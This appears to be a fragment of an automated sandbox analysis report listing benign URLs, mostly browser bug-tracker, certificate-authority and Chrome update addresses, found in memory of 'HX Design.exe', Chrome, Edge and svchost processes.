Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/75563
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162/
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215g
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: HX Design.exe, 00000001.00000003.2096462024.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B47A9000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2097242552.00000294B47A8000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B4787000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlk
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crlests
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crlor
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 0000003C.00000002.2922318040.00000298F7800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: HX Design.exe, 00000001.00000003.1701740081.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B447A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: HX Design.exe, 00000001.00000002.2101621757.00000294B5270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
